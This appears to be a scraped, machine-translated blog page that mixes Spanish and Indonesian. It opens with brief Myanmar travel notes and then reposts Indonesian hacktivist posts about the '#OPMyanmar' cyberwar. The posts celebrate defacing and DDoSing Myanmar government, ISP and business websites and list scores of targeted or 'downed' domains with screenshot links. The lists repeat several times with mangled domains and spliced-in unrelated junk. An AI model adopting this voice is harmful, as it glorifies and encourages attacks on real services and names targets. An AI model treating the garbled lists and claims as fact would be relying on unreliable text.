Tuesday, November 29, 2016

Forex Cbm Gov Mm

Situado en las orillas del río Yangon, que es una ciudad principal administrativo y comercial ocupado de Myanmar. In el lejano pasado esto era sólo un pequeño pueblo de pescadores llamado Dagón pero el rey Alaung Paya, después de derrotar a sus enemigos, le cambió el nombre nto significado Yangon " Fin de la lucha "en 1775 AD Más tarde, el gobierno colonial británico también amplió y modernizó la ciudad.

Manadalay fue la última capital de la dinastía imperial Konboung de Myanmar antes de que el país fue anexado por los británicos en 1886 y exiliado rey A. D Thibaw a Ratanagiri en India. It también es considerado como el centro cultural de la capital. Muchos artistas y artesanos hacen Mandalay su ciudad natal. El palacio de Mandalay, construido por el rey Mindon en 1859 A. D es una de las atracciones principales.

La sede del 1er Imperio de Myanmar fundada por el rey Anawrahta a mediados del siglo 11 dC Aunque leyendas dicen que no se supone que hay más de cuatrocientos mil pagodas en Bagan en la actualidad hay aproximadamente 2.000 pagodas situadas en un aera de aproximadamente 16 millas cuadradas y bajo la Cuidado del departamento de Achaeological.


Yadi000.blogspot. com - Selamat siang sobrenat Yadi000 Blog, beberapa HARI ini. Serangan Serempak telah dilakukan Oleh HACKER INDONESIA ke ISP dan WEBSITE2 Myanmar, di karenakan ini adalah bentuk kepedulian Hacker Indonesia dengan apa yang telah di lakukan oleh HACKER MYANMAR yang telah merusak página web - sitio web Indoensia, dan Menghina Agama Islam, HACKER INDONESIA berjuang Untuk MARTABAT membelah, Dan HARGA DIRI BANGSA INDONESIA yang tela de Lecehkan oleh negara lain. Disaat 230 situs indonesia bahkan lebih dihajar oleh Myanmar, siapakah yang membalas?

Apakah polisi cyber Indonesia. Apakah pemerintah Indonesia. Tidak. Hacker lah yang dengan gigih menjunjung tinggi derajat bangsa ini dengan melakuka n gerakan OP Myanmar. Tanga digaji pun hacker Indonesia akan bahu Membhu membalas serangan yang dilakukan oleh Myanmar. Seperti yang kita ketahui, Myanmar sangat Mudah aksi melakukan desfigurar masal ke situs Indonesia karena mereka difasiliatsi Untuk UIT. Maksudnya. Ya, situs Indonesia sangat banyak. Jelas sangat mudan jika hanya mencari insecto dan kemudian melakukan enlace simbólico. Di Indonesia ada google. co. id yang memudahkan merok melakukan exploración terhadap web objetivo. Bandingkan dengan mereka. Situs Myanmar sedikit. Di sana tidak ada situs google. Sangat el jitán del jaz del harus masuk lewat celah keamanan. Oleh karena UIT, Malam ini diputuskan DDoSer Indonesia Akan melakukan Balasan dengan meratakan situs-situs Myanmar secara bersama-sama.

Beberapa Serangan telah di lancarkan ke Negara Myanmar, di Bawah página web LISTA ini Myanmar yang sudah Pernah abajo, di Deface, hackeado, dan 404


ais. gov. mm

amd. moai. gov. mm

asiaholidays. com. mx

asialight. com. mm

asianskytravels. com

asiantrails. com. mx

asianwingsairways. com. mm

cbm. gov. mm

city. com. mm

cnj. net. mm

commerce. gov. mm

consultoría. com. mx

cosco. com. mx

ct. com. mm

daewooenp. com. mm

dar. moai. gov. mm

dca. gov. mm

tierra. com. mx

once. com. mx

elibrary. com. mm

disfruten. es. mm

Forex. cbm. gov. mm = Abajo http://prntscr. com/s836q

forum. myanmarfrangipanitours. com

geocomp-myanmar. net. mm

globalnet. com. mm

globalsongroup. com

gmrockentgroup. com

hantharwaddy. net. mm

hotel-tourism. gov. mm

indiaembassy. net. mm

industry2.gov. mm

irdmyanmar. gov. mm

irrigation. gov. mm

irrigation. gov. mm

isy. net. mm

kmd. com. mx

madb. moai. gov. mm

mail4u. com. mm

mailtx. teleport. net. mm

marychapman-mm. org

mbl. com. mm

mcpa. org. mm

mes. org. mm

micde. moai. gov. mm

minera. com. mx

mit. com. mm

mmmc. edu. mm

mnped. gov. mm

moc. gov. mm

mofr. gov. mm

mosports. gov. mm

mot. gov. mm

mpa. gov. mm

mprlnet. com. mx

mptmail. com. mm

mptmail. net. mm

mptsat. com. mm

mwd. com. mm

myanmar. com. mx

myanmar. gov. mm

myanmar. net. mm

myanmarbizdirectory. com

myanmarfishexporter. com

myanmarnlp. org. mm

myanmaronline. com. mm

myanmaronline. net. mm

myanmartradenet. com. mx

myanmartravelguides. com

myanmatimber. com. mm

myanpay. net. mm

myantel. net. mm

myringtune. com. mm

myringtuneonline. com. mm

nebulosa. com. mx

nestlemyanmar. com. mx

nic. net. mm

npt. net. mm

ns4.nic. net. mm

opal. net. mm

people. com. mm

planeta. com. mx

pomail. gov. mm

president-office. gov. mm

primeboss. com. mx

redlink. net. mm

redlinkcare. net. mm

royalgoldentortoise. com

royalwhisky. net. mm

rpmm. com. mx

rubyland. com. mm

sb. gov. mm

sd. moai. gov. mm

spa. com. mx

sunfar. com. mm

super. com. mx

talentsnmodels. com

talisman. com. mx

tawwincentre. com. mm

teleport. net. mm

thaiairways. com. mx

tinaungzawtrading. com

tinmoelwin. com

tnk. net. mm

todaygroup. com. mm

tourmandalay. com. mx

ucsb. gov. mm

umfcci. com. mm

ummg. edu. mm

webasaservice. com

webmail. mm. com

wimaxmail. net. mm

wpiteam. net. mm

wrud. moai. gov. mm

yangtse. com. mx

yatanarponca. com. mx

yau. moai. gov. mm

yomabank. com. mx

zte. com. mm


Compartir este

Beberapa hari ini merupakan hari perjuangan bagi para hacktivista (Aktivist Hacker) karena telah banyak situs situs web Indonesia yang telah tumbang oleh para Hacker Myanmar dan menghina agama Islam. Hacker Indonesia es un sitio web de sitio web Myanmar.

Siapa lagi yang akan berjuang. Ia pastinya para Hacker Indonesia lah yang akan berjuang de Sabang sampai Marauke. Inilah salah satu bentuk kepedulian kami terhadap Indonesia, yang mungkin sebagian besar dari Indonesia tidak mengetahuinya. Bahkan sampai detik ini medios de comunicación ada yang memberitakan informasi penting ini.

Memang Myanmar lebih mudah merusak situs Indonesia dikarenakan banyaknya situs Indonesia dibanding Myanmar. Di Indonesia ada google. com. mx yang memudahkan mierka untuk mencari banyak objetivo sedangkan Myanmar tidak memiliki fasilitas google de situs mereka sangat lah dikit. Sangat sulit jika harus masuk queh kemanan.

Jika y el ingin melihat situs web Indonesia yang menjadi korban silakan buka ini enlace:

Begitu banyak situs kita yang menjadi korban dikarenakan menjamurnya situs Web Indonesia di google. es

Situs Web Myanmar yang Pernah Abajo.

ais. gov. mm

amd. moai. gov. mm

asiaholidays. com. mm

asialight. com. mm

asianskytravels. com

asiantrails. com. mx

asianwingsairways. com. mm

cbm. gov. mm

city. com. mm

cnj. net. mm

commerce. gov. mm

consultoría. com. mx

cosco. com. mx

ct. com. mm

daewooenp. com. mm

dar. moai. gov. mm

dca. gov. mm

tierra. com. mx

once. com. mx

elibrary. com. mm

disfruten. es. mm

Forex. cbm. gov. mm = Abajo http://prntscr. com/s836q

forum. myanmarfrangipanitours. com

geocomp-myanmar. net. mm

globalnet. com. mm

globalsongroup. com

gmrockentgroup. com

hantharwaddy. net. mm

hotel-tourism. gov. mm

indiaembassy. net. mm

industry2.gov. mm

irdmyanmar. gov. mm

irrigation. gov. mm

irrigation. gov. mm

isy. net. mm

kmd. com. mx

madb. moai. gov. mm

mail4u. com. mm

mailtx. teleport. net. mm

marychapman-mm. org

mbl. com. mm

mcpa. org. mm

mes. org. mm

micde. moai. gov. mm

minera. com. mx

mit. com. mm

mmmc. edu. mm

mnped. gov. mm

moc. gov. mm

mofr. gov. mm

mosports. es

mot. gov. mm

mpa. gov. mm

mprlnet. com. mx

mptmail. com. mm

mptmail. net. mm

mptsat. com. mm

mwd. com. mm

myanmar. com. mx

myanmar. gov. mm

myanmar. net. mm

myanmarbizdirectory. com

myanmarfishexporter. com

myanmarnlp. org. mx

myanmaronline. com. mm

myanmaronline. net. mm

myanmartradenet. com. mx

myanmartravelguides. com

myanmatimber. com. mm

myanpay. net. mm

myantel. net. mm

myringtune. com. mm

myringtuneonline. com. mm

nebulosa. com. mx

nestlemyanmar. com. mx

nic. net. mm

npt. net. mm

ns4.nic. net. mm

opal. net. mm

people. com. mm

planeta. com. mx

pomail. gov. mm

president-office. gov. mm

primeboss. com. mx

redlink. net. mm

redlinkcare. net. mm

royalgoldentortoise. com

royalwhisky. net. mm

rpmm. com. mx

rubyland. com. mm

sb. gov. mm

sd. moai. gov. mm

spa. com. mx

sunfar. com. mm

super. com. mx

talentsnmodels. com

talisman. com. mx

tawwincentre. com. mm

teleport. net. mm

thaiairways. com. mm

tinaungzawtrading. com

tinmoelwin. com

tnk. net. mm

todaygroup. com. mm

tourmandalay. com. mx

ucsb. gov. mm

umfcci. com. mm

ummg. edu. mm

webasaservice. com

webmail. mm. com

wimaxmail. net. mm

wpiteam. net. mm

wrud. moai. gov. mm

yangtse. com. mx

yatanarponca. com. mx

Yau. moai. gov. mm

yomabank. com. mx

zte. com. mm

Dan lain lain

Tambahan genting buat orang Madura:

TENER CUIDADO. GUERRA CIBERNÉTICA. Indonesia vs Myanmar. Lista de sitios web de Indonesia hackeados primero Por Myanmar Buddhism Hackers:

Http://www. balomholiday. com/ http://e-smpi. yadairs. sch. id/ http://www. rajawaliindonesia. com/ http://www. agungportal. net/ http: // www. Amartacom. co. id/ http://www. tokobunganatalia. com/ http://www. riandika-indonesia. com/ http://www. taocorps. com/ http://www. sedekah. web. id/ Http://www. tunasindonesiatours. com/ http://smpn1cangkringan. sch. id/ http://rumah-jogja. net/ http://www. fisio-medical. com/medical http://produsendrumband. com / Http://slemanjogja. com/ http://siregar. web. id/

Hacked Back de Indonesia a Myanmar Sitios:


MYANMAR GOVERNMENT WEB http://www. dca. gov. mm/ & gt; & gt; & gt; & gt; & gt; & gt; servidor caido

Http://globalsongroup. com/ http://gmrockentgroup. com/ http://marychapman-mm. org/ http://asianskytravels. com/ http://myanmarbizdirectory. com/ http://myanmarfishexporter. com/ Http://myanmartravelguides. com/ http://royalgoldentortoise. com/ http://talentsnmodels. com/ http://tinaungzawtrading. com/ http://tinmoelwin. com/ http://webasaservice. com/ 1 http : //www. industry2.gov. mm/ 2 http://www. irrigation. gov. mm/ 3 www. hotel-tourism. gov. mm 4 www. industry2.gov. mm 5 www. irdmyanmar. gov. mm 6 www. mnped. gov. mm 7 www. moc. gov. mm 8 www. pomail. gov. mm 9 www. ns4.nic. net. mm 10 www. hantharwaddy. net. mm 11 www. mptmail. net. mm 12 www. myanmar. net. mm 13 www. nic. net. mm 14 www. wpiteam. net. mm 15 www. npt. net. mm 16 www. elibrary. com. mm 17 www. mptmail. com. mm 18 www Www. mpasat. com. mx 19 www. myanmarnlp. org. mm 20 www. people. com. mm 21 www. rubyland. com. mm 23 www. mcpa. org. mm 24 http://www. mailtx. teleport. net. mm / 25 http://ais. gov. mm/ 26 http://asiaholidays. com. mm/ 27 http://tnk. net. mm/ 28 http://www. dca. gov. mm/ 29http : //www. myanmar. com. mm/ 30 http://www. myanmaronline. com. mm/ 31 http://www. myringtune. com. mm/ 32 http://www. planet. com. mm/ 33 http://www. redlink. net. mm/ 34 http://redlinkcare. net. mm/ 35 http://rpmm. com. mm/ 36 http://spa. com. mm/ 37 http: /webmail. mm. com/ 38 http://www. irrigation. gov. mm/ 39 http://www. mnped. gov. mm/ 40 http://www. moc. gov. mm/ 41 http: /forum. myanmarfrangipanitours. com/ 42 http://globalsongroup. com/ 43 http://gmrockentgroup. com/ 44 http://marychapman-mm. org/ 45 http://asianskytravels. com/ 46 http: // Myanmarbizdirectory. com/ 47 http://myanmarfishexporter. com/ 48 http://myanmartravelguides. com/ 49 http://royalgoldentortoise. com/ 50 http://talentsnmodels. com/ 51 http://tinaungzawtrading. com/ 52 Http://tinmoelwin. com/ 53 http://webasaservice. com/ 54 http://forex. cbm. gov. mm/index. php/fxrate = Abajo http://prntscr. com/s836q 55 http: / /yau. moai. gov. mm/ 56 http://sd. moai. gov. mm/ 57 http://amd. moai. gov. mm/ 58 http://wrud. moai. gov. mm/ 59 http : //madb. moai. gov. mm/ 60 http://dar. moai. gov. mm/ 61 http://micde. moai. gov. mm/ 62 www. president-office. gov. mm 63 http: //www. tawwincentre. com. mm/ 64 http://cbm. gov. mm/ 65 www. moc. gov. mm 67 http://www. mptsat. com. mm/ 68 www. elibrary. com. mm 69 http://www. rubyland. com. mm/ 70 http://www. people. com. mm/index. cfm 71 http://www. myanmarnlp. org. mm/ 72 http: //www. myanmar. net. mm / 73 http://www. pomail. gov. mm/ 74 http://www. irdmyanmar. gov. mm/ 75 http://www. mptmail. net. mm/ 76 www. irrigation. gov. mm 77 www. industry2.gov. mm 78 www. hotel-tourism. gov. mm 79 www. mmmc. edu. mm 80 www. ais. gov. mm 81 www. dca. gov. mm 82 www. mnped. gov. mm 83 www. ais. gov. mm 84 www. hotel-tourism. gov. mm 85 www. industry2.gov. mm 86 www. irdmyanmar. gov. mm 87 www. moc. gov. mm 88 www. pomail. gov. mm 89 www. ns4.nic. net. mm 90 www. hantharwaddy. net. mm 91 www. mptmail. net. mm 92 www. myanmar. net. mm 93 www. nic. net. mm 94 www. wpiteam. net. mm 95 www. npt. net. mm 96 www. elibrary. com. mm 97 www. mptmail. com. mm 98 www. mptsat. com. mm 99 www. myanmarnlp. org. mm 100 www. people. com. mm 101 www. rubyland. com. mm 104 www. mcpa. org. mm 105 http://www. mailtx. teleport. net. mm/ 106 http://ais. gov. mm/ 107 http://asiaholidays. com. mm / 108 http://tnk. net. mm/ 109 http://www. dca. gov. mm/ 110 http://www. myanmar. com. mm/ 111 http://www. myanmaronline. com. mm / 112 http://www. myringtune. com. mm/ 113 http://www. planet. com. mm/ 114 http://www. redlink. net. mm/ 115 http://redlinkcare. net. mm / 116 http://rpmm. com. mm/ 117 http://spa. com. mm/ 118 http://webmail. mm. com/ 119 ww. asiaholidays. com. mm 120 www. asialight. com. mm 121 http://asianwingsairways. com. mm/ 122 http://asiantrails. com. mm/ 123 www. http: //cbm. gov. mm/ 124 www. http: //city. com. mm/ 125 http://cnj. net. mm/ 126 http://commerce. gov. mm/ 127 http://consultancy. com. mm/ 128 http://cosco. com. mm/ 129 http: // ct. com. mm / 130 www. daewooenp. com. mm 131 www. dca. gov. mm 132 www. earth. com. mm 133 www. eleven. com. mm 134 www. enjoy. net. mm 135 www. geocomp - 135 mbl. com. mm 136 mes. org. mm 137 minería. Www3.ipc. org. es www3.ipc. org. es www3.ipc. org. es www3.ipc. org. es inversores. bbva. es inversores. bbva. es inversores. bbva. es inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com inversores. bbva. com Mm 146 myanmar. gov. mm 147 myanmaronline. net. mm 148 myanmartradenet. com. mm 149 myanmatimber. com. mm 150 myanpay. net. mm 151 myantel. net. mm 152 myringtune. com. mm 153 myringtuneonline. com. mm 154 Www. europa. org. mx 159 www. europa. org. mx 159 redlink. net. mm 160 redlinkcare. net. mm 161 royalwhisky. net. mm 162 rpmm. Www2.cochrane. org www2.cochrane. org thumb up thumb down 170. Hoy en día. Mm 171 tourmandalay. com. mx 172 ucsb. gov. mm 173 umfcci. com. mm 174 ummg. edu. mm 175 webmail. com. mx 176 wimaxmail. net. mx 177 yangtse. com. mx 178 yatanarponca. com. mx 179 Yomabank. com. mm 180 zte. com. mm

Entablar ahora. Se atascan entre sí. Myanmar ya ha ocurrido Guerra cibernética Con Bangladesh por asesinato de personas inocentes Rohingya islámica en Myanmar .. Ahora luchar de nuevo con Indonesia .. No sé qué razón en realidad se puso en el tema Pero estoy seguro Myanmar empezar a atacar a Indonesia Varios sitios web en primer lugar.

También podría gustarte :

Beberapa hari ini merupakan hari perjuangan bagi para hacktivista (Aktivist Hacker) karena telah banyak situs situs web Indonesia yang telah tumbang oleh para Hacker Myanmar dan menghina agama Islam. Hacker Indonesia es un sitio web de sitio web Myanmar.

Siapa lagi yang akan berjuang. Ia pastinya para Hacker Indonesia lah yang akan berjuang de Sabang sampai Marauke. Inilah salah satu bentuk kepedulian kami terhadap Indonesia, yang mungkin sebagian besar dari Indonesia tidak mengetahuinya. Bahkan sampai detik ini medios de comunicación ada yang memberitakan informasi penting ini.

Memang Myanmar lebih mudah merusak situs Indonesia dikarenakan banyaknya situs Indonesia dibanding Myanmar. Di Indonesia ada google. com. mx yang memudahkan mierka untuk mencari banyak objetivo sedangkan Myanmar tidak memiliki fasilitas google de situs mereka sangat lah dikit. Sangat sulit jika harus masuk queh kemanan.

Jika y el ingin melihat situs web Indonesia yang menjadi korban silakan buka ini enlace:

Begitu banyak situs kita yang menjadi korban dikarenakan menjamurnya situs Web Indonesia di google. es

Situs Web Myanmar yang Pernah Abajo.

ais. gov. mm

amd. moai. gov. mm

asiaholidays. com. mm

asialight. com. mm

asianskytravels. com

asiantrails. com. mx

asianwingsairways. com. mm

cbm. gov. mm

city. com. mm

cnj. net. mm

commerce. gov. mm

consultoría. com. mx

cosco. com. mx

ct. com. mm

daewooenp. com. mm

dar. moai. gov. mm

dca. gov. mm

tierra. com. mx

once. com. mx

elibrary. com. mm

disfruten. es. mm

Forex. cbm. gov. mm = Abajo http://prntscr. com/s836q

forum. myanmarfrangipanitours. com

geocomp-myanmar. net. mm

globalnet. com. mm

globalsongroup. com

gmrockentgroup. com

hantharwaddy. net. mm

hotel-tourism. gov. mm

indiaembassy. net. mm

industry2.gov. mm

irdmyanmar. gov. mm

irrigación. gov. mm

irrigation. gov. mm

isy. net. mm

kmd. com. mx

madb. moai. gov. mm

mail4u. com. mm

mailtx. teleport. net. mm

marychapman-mm. org

mbl. com. mm

mcpa. org. mm

mes. org. mm

micde. moai. gov. mm

minera. com. mx

mit. com. mm

mmmc. edu. mm

mnped. gov. mm

moc. gov. mm

mofr. gov. mm

mosports. gov. mm

mot. gov. mm

mpa. gov. mm

mprlnet. com. mx

mptmail. com. mm

mptmail. net. mm

mptsat. com. mm

mwd. com. mm

myanmar. com. mx

myanmar. gov. mm

myanmar. net. mm

myanmarbizdirectory. com

myanmarfishexporter. com

myanmarnlp. org. mm

myanmaronline. com. mm

myanmaronline. net. mm

myanmartradenet. com. mx

myanmartravelguides. com

myanmatimber. com. mm

myanpay. net. mm

myantel. net. mm

myringtune. com. mm

myringtuneonline. com. mm

nebulosa. com. mx

nestlemyanmar. com. mx

nic. net. mm

npt. net. mm

ns4.nic. net. mm

opal. net. mm

people. com. mm

planeta. com. mx

pomail. gov. mm

president-office. gov. mm

primeboss. com. mx

redlink. net. mm

redlinkcare. net. mm

royalgoldentortoise. com

royalwhisky. net. mm

rpmm. com. mx

rubyland. com. mm

sb. gov. mm

sd. moai. gov. mm

spa. com. mx

sunfar. com. mm

super. com. mx

talentsnmodels. com

talisman. com. mx

tawwincentre. com. mm

teleport. net. mm

thaiairways. com. mx

tinaungzawtrading. com

tinmoelwin. com

tnk. net. mm

todaygroup. com. mm

tourmandalay. com. mx

ucsb. gov. mm

umfcci. com. mm

ummg. edu. mm

webasaservice. com

webmail. mm. com

wimaxmail. net. mm

wpiteam. net. mm

wrud. moai. gov. mm

yangtse. com. mx

yatanarponca. com. mx

yau. moai. gov. mm

yomabank. com. mx

zte. com. mm

Equipo-Cyber4rt - Beberapa hari ini merupakan Hari Perjuangan bagi párrafo hacktivista (Aktivist Hacker) termasuk saya berjuang Untuk membela Indonesia walaupun saya masih novato TAPI saya tetap salurkan kemampuan saya walaupun hanya bantú DDO S, bien Langsung saja ke tkp sudah mallam juga ni abang sudah Ngantuk. Hahahaaa lebai D karena telah Banyak situs situs Web Indonesia yang telah Tumbang oleh párrafo Hacker Myanmar dan Menghina Agama Islam. Hacker Indonesia es un sitio web de sitio web Myanmar.

Siapa lagi yang akan berjuang. Ia pastinya para Hacker Indonesia lah yang akan berjuang de Sabang sampai Marauke. Inilah Salah satu bentuk kepedulian kami terhadap Indonesia, yang mungkin sebagian besar mengetahuinya tidak dari Indonesia. Bahkan sampai detik ini medios de comunicación ada yang memberitakan informasi penting ini.

Memang Myanmar Lebih mudah merusak situs Indonesia dikarenakan banyaknya situs Indonesia dibanding Myanmar. Di Indonesia ada google. co. id yang memudahkan mereka Untuk objetivo Banyak mencari sedangkan Myanmar tidak memiliki fasilitas Google dan situs mereka dikit sangat LAH. Sangat sulit jika harus masuk queh kemanan.

Begitu banyak situs kita yang menjadi korban dikarenakan menjamurnya situs Web Indonesia di google. es

Situs Web Myanmar yang Pernah Abajo:

Beberapa HARI ini. Serangan Serempak telah dilakukan Oleh HACKER INDONESIA ke ISP dan WEBSITE2 Myanmar, di karenakan ini adalah bentuk kepedulian Hacker Indonesia dengan apa yang telah di lakukan oleh HACKER MYANMAR yang telah merusak página web - sitio web Indoensia, dan Menghina Agama Islam, HACKER INDONESIA berjuang Untuk MARTABAT membelah, Dan HARGA DIRI BANGSA INDONESIA yang tela de Lecehkan oleh negara lain. Disaat 230 situs indonesia bahkan lebih dihajar oleh Myanmar, siapakah yang membalas?

Apakah polisi cyber Indonesia. Apakah pemerintah Indonesia. Tidak. Hacker LAH yang dengan Gigih menjunjung Tinggi Derajat Bangsa ini dengan melakukan OP gerakan Myanmar. Tanga digaji pun hacker Indonesia akan bahu Membhu membalas serangan yang dilakukan oleh Myanmar. Seperti yang kita ketahui, Myanmar sangat Mudah aksi melakukan desfigurar masal ke situs Indonesia karena mereka difasiliatsi Untuk UIT. Maksudnya. Ya, situs Indonesia sangat banyak. Jelas sangat mudan jika hanya mencari insecto dan kemudian melakukan enlace simbólico. Di Indonesia ada google. co. id yang memudahkan merok melakukan exploración terhadap web objetivo. Bandingkan dengan mereka. Situs Myanmar sedikit. Di sana tidak ada situs google. Sangat el jitán del jaz del harus masuk lewat celah keamanan. Oleh karena itu, diputuskan malam ini DDoSer Indonesia akan melakukan balasan dengan meratakan situs situs Myanmar secara bersama-sama.

Beberapa serangan tela de lancarkan ke Negara Myanmar, di bawah ini LIST sitio web Myanmar yang sudah Pernah abajo, di Deface, hackeado, dan 404


ALJINET - pastinya sudah mendegar di berita en línea atau berita tv dan media lainnya. Dan Aljinet en el mundo de la música #opmyanmar kedalam el artículo de blogger aljinet Tentang musulmanes de myanmar. Yang membunuh dengan sadis para sodara musulmanes, Banyak yang mengecam tindakan ini salah satunya hacker indonesia yang melakukan aksinya dengan nama #opmyanmar.

Serangan ini beramai rami dengan aksi defecto mengubah portal de la página web de la página web de la base de datos de la base de datos milik situs myamar. Ada juga yang melakukan Dodos ke seluruh dominio yang ber ulr di gov. mm salah satu aksi hacker indonesia yang telah melumpuhkan sitio web myanmar dengan aski ddosnya yaitu situs yang berdomain http://www. mofa. gov. mm/. Sitio web tersebut sekarang hilang dan tidak bisa di akses untuk sementara waktu.

Total Keseluruha web myanmar yang abajo

Tidak tingak diam hacker myamar pun melakukan serang balasan dengan menghack situs pribadi dan pemerintahan indonesia dan melakukan ddos ​​salah satunya situs http://indonesia. go. id/ yang di ddos ​​abis abisan oleh hacker myamar.

Semangat indonesia | kita bersatu | tidak boleh bercerai berai | tunjukan kita pancasila

22 de abril de 2014 03.37 Responder

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Poskan Komentar

Pembaca, yang baik selalu, memberi comentar yang baik pula, buar artikel aljinet ini, biar ada masukan lebih dan memgembangkan blog aljinet ini, untuk itu discarankan comentlah artikel kami, beri kritikan yang pedas tidak masalah, silakan di coment kawan

Situs Presiden Myanmar Luluh Lantak Akibat Serangan Hacker Indonesia

Pertempuran dunia maya atau biasa disebut cyber guerra antara Hacker Indonesia vs Hacker Myanmar masih belum selesai. Semakin memanasnya pertempuran en el berakibat pada penyerangan situs-situs penting antar negrita, dan tak luput juga situs Presidencia Myanmar yang menjadi salah satu target utama #OP Myanmar ini. Setelah penyerangan beberapa kali oleh ratusan simpatisan yang tergabung dalam kelompok ini, akhirnya situs orang nomer satu tersebut berhasil ditumbangkan.

Selain menumbangkan situs Presiden Myanmar tersebut, para Pejuang Cyber ​​Indonesia es un sitio web que se encuentra en la parte inferior de la página web de Bangsa Indonesia. Berikut beberapa situs yang pernah disinggahi oleh Pejuang Cyber ​​Indonesia:

Lista Sitio web yang sempat dibuat Error, 500, 503, 404

Lista Sitio web yang pernah di Destacado atau diacak-acak Hacker Indonesia

1. http://www. ourmyanmar. org 2. http://www. myanmarcatholiccommunity. com 3. http://myanmarbizdirectory. com 4. http://myanmarfishexporter. com 5. http://myanmartravelguides. com 6 Http://royalgoldentortoise. com 7. http://talentsnmodels. com 8. http://tinaungzawtrading. com 9. http://tinmoelwin. com 10.http: //trailsofmyanmartravel. com 11.http: // Myasoc. com. mm 12.http: //www. mvces. net 13.http: //burma-forums. com/forum 14.http: //www. scenicmyanmar. com 15.http: // prs-international. Org 16.http: //www. asmbuilding. com 17.http: //maihsoongtravel. com 18.http: //www. worldmyanmartravel. com 19.http: //www. goldenpasstravel. com 20.http: // panmintk. com 21.http: //www. soccerweeklytips. com 22.http: //www. mandalayproperties. com 23.http: //dentist-myanmar. com 24.http: //myanmarblooddonation. com 25.http: // Myanmartimberassociation. org 26.http: //myawaddytrade. com 27.http: //www. yjh1979.com 28.http: //baganayeyarhotel. com 29.http: //www. jivitahospital. org 30.http: // inforithm - maze. com 31.http: //www. maykaung. com 32.http: //phyusayadaw. com 33.http: //woodlandtravels. com 34.http: //www. vitaco-cosmetics. com 35.http: //uqfamilyflourmill. com 36.http: //www. sltresort. com 37.http: //www. sinyawmgmg. com 38.http: //www. asiaelephantcoach. com 39.http: //www. mmphotoshop. net 40.http: //kpyramid. com 41.http: //allsummyanmar. com 42.http: //analyticsbyim. com 43.http: //arrmahnthitautomobile. com 44.http: //constructionbyim. com 45.http: // Creationsbyim. com 46.http: //dagonbeverages. com 47.http: //diamondinyapalace. com 48.http: //dozofashion. com 49.http: //eve500.com 50.http: //expressbyim. com 51. Http://fascinatingmyanmar. com 52.http: //fascinatingmyanmar. info 53.http: //hstpharma. com 54.http: //ieltsinmyanmar. com 55.http: //kyaukseinnwe. com 56.http: // linyama. com 57.http: //myanmarnaturalwondertravels. com 58.http: //myanmarpetro. org 59.http: //www. peoplemediabyim. com 60.http: //www. informationmatrix. com 61.http: // royalnaynantaw. Com 62.http: //rrdmyanmar. org 63.http: //saetaw999-trading. com 64.http: //sagawaconsultancy. com 65.http: //samparoo. com 66.http: //shogunmyanmar. com 67. Http://sml-myanmar. com 68.http: //solutionsbyim. com 69.http: //totalsupplychainmyanmar. com 70.http: //trianglelinks. com

Sekian escribiendo kali ini, semiajera para el pembaca sekalian.

Perlawanan Indonesia Combatiente Cyber ​​Terhadap Hacker Myanmar

Perlawanan Indonesia Combatiente Cyber ​​Terhadap Hacker Myanmar


Sejauh ini Indonesia telah menyerang 183 Web myanmar de mianmar telah meyerang 162 Web INDONESIA

Sitio web yang telah di bobol Indonesia

1 http://www. industry2.gov. mm/ SS http://prntscr. com/sd0ib (Hilang) 2 http://www. irrigation. gov. mm/ SS http://prntscr. com/sd0oh ( Servidor GANTI o apalah itu) 3 www. hotel-tourism. gov. mm SS http://prntscr. com/sd0wx (Hilang) 4 www. industry2.gov. mm SS http://prntscr. com/sd0ib (Hilang) 5 www. irdmyanmar. gov. mm (UP lagi) 6 www. mnped. gov. mm SS http://prntscr. com/sd17j (404) 7 www. moc. gov. mm SS http://prntscr. com/ Sd1g7 (servidor Ganti o apalah itu) 8 www. pomail. gov. mm SS http://prntscr. com/sd1js (hilang) 9 www. ns4.nic. net. mm SS http://prntscr. com/sd1uv Down dan Hilang) 10 www. hantharwaddy. net. mm SS http://prntscr. com/sd25a (En construcción) 11 www. mptmail. net. mm SS http://prntscr. com/sd2k9 (Hilang) 12 www. Myanmar. net. mm SS http://prntscr. com/sd2qx (Hilang) 13 www. nic. net. mm SS http://prntscr. com/sd2ws (Abajo dan Hilang) 14 www. wpiteam. net. mm SS Http://prntscr. com/sd368 & amp; amp; amp; Http://prntscr. com/sd3bq 15 www. npt. net. mm SS http://prntscr. com/sd3go (servidor Hilang o ganti) 16 www. elibrary. com. mm SS http://prntscr. com/ Sd3o4 (Hilang) 17 www. mptmail. com. mm SS http://prntscr. com/sd3ro (hilang) 18 www. mptsat. com. mm SS http://prntscr. com/sd3wb (Hilang) 19 www. myanmarnlp. org. mm SS http://prntscr. com/sd44h (Hilang) 20 www. people. com. mm SS http://prntscr. com/sd49l (Kenapa tuh?) 21 www. rubyland. com. mm SS http : //prntscr. com/sg0qr (Abajo o lo que sea) 23 www. mcpa. org. mm SS http://prntscr. com/sg0ug (Hilang) 24 http://www. mailtx. teleport. net. mm/ SS Http://prntscr. com/sg0ws (Abajo) 25 http://ais. gov. mm/ SS http://prntscr. com/sg0z0 (Hilang) 26 http://asiaholidays. com. mm/ SS http: //prntscr. com/sg12e (Abajo) 27 http://tnk. net. mm/ SS http://prntscr. com/sg160 (Hilang) 28 http://www. dca. gov. mm/ SS http: //prntscr. com/sg1c5 (Kenapa nih?) 29 http://www. myanmar. com. mm/ SS http://prntscr. com/sg1la (Hilang) 30 http://www. myanmaronline. com. mm / SS http://prntscr. com/sg1pl (Kenapa nih?) 31 http://www. myringtune. com. mm/ SS http://prntscr. com/sg1ug (Hilang) 32 http: //www. planet. com. mm / (UP lagi) 33 http://www. redlink. net. mm/ (UP lagi) 34 http://redlinkcare. net. mm/ SS http://prntscr. com/sg22s (Hilang) 35 http://rpmm. com. mm/ SS http://prntscr. com/sg25m (En construcción) 36 http://spa. com. mm/ SS http://prntscr. com/sg2bz (404) 37 Http://webmail. mm. com/ SS http://prntscr. com/sg2e1 (Hilang) 38 http://www. irrigation. gov. mm/ SS http://prntscr. com/sd0oh (Servidor GANTI o Apalah itu) 39 http://www. mnped. gov. mm/ SS http://prntscr. com/sg2h7 (404) 40 http://www. moc. gov. mm/ SS http://prntscr. com / Sd1g7 (Servidor de Ganti o apalah itu) 41 http://forn. myanmarfrangipanitours. com/ SS http://prntscr. com/sg2p6 (Kenapa nih?) 42 http://globalsongroup. com/ SS http: // prntscr. com / sg2ug & amp; amp; Http://prntscr. com/sg2x5 